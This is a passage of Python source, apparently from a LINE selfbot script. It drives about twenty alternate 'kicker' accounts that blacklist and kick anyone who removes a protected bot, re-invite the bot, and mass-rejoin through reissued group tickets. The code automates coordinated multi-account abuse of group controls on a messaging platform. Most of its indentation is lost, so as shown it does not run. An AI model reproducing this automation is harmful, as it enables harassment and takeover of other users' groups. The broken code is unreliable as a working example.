kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
pass
return
            if Fmid in op.param3:
                if op.param2 in Bots or op.param2 in owner or op.param2 in admin or op.param2 in staff:
                    pass
                else:
                    wait["blacklist"][op.param2] = True
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
G = kicker10.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.updateGroup(G)
Ticket = kicker10.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker10.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker10.updateGroup(G)
Ticket = kicker10.reissueGroupTicket(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
pass
return
            if Gmid in op.param3:
                if op.param2 in Bots or op.param2 in owner or op.param2 in admin or op.param2 in staff:
                    pass
                else:
                    wait["blacklist"][op.param2] = True
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
G = kicker11.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.updateGroup(G)
Ticket = kicker11.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker11.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker11.updateGroup(G)
Ticket = kicker11.reissueGroupTicket(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
pass
return
            if Hmid in op.param3:
                if op.param2 in Bots or op.param2 in owner or op.param2 in admin or op.param2 in staff:
                    pass
                else:
                    wait["blacklist"][op.param2] = True
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
G = kicker12.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.updateGroup(G)
Ticket = kicker12.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker12.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker12.updateGroup(G)
Ticket = kicker12.reissueGroupTicket(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
pass
return
            if Imid in op.param3:
                if op.param2 in Bots or op.param2 in owner or op.param2 in admin or op.param2 in staff:
                    pass
                else:
                    wait["blacklist"][op.param2] = True
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
G = kicker13.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.updateGroup(G)
Ticket = kicker13.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker13.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker13.updateGroup(G)
Ticket = kicker13.reissueGroupTicket(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker9.acceptGroupInvitation(op.param1)
except:
pass
return
if Jmid in op.param3:
if op.param2 in Bots or op.param2 in owner or op.param2 in admin or op.param2 in staff:
    pass
else:
wait["blacklist"][op.param2] = True
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
G = kicker14.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.updateGroup(G)
Ticket = kicker14.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker14.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker14.updateGroup(G)
Ticket = kicker14.reissueGroupTicket(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker10.acceptGroupInvitation(op.param1)
except:
pass
return
if ga1 in op.param3:
if op.param2 in Bots or op.param2 in owner or op.param2 in admin or op.param2 in staff:
    pass
else:
wait["blacklist"][op.param2] = True
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
G = kicker15.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.updateGroup(G)
Ticket = kicker15.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker15.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker15.updateGroup(G)
Ticket = kicker15.reissueGroupTicket(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
pass
return
if ga2 in op.param3:
if op.param2 in Bots or op.param2 in owner or op.param2 in admin or op.param2 in staff:
    pass
else:
wait["blacklist"][op.param2] = True
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
G = kicker16.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.updateGroup(G)
Ticket = kicker16.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
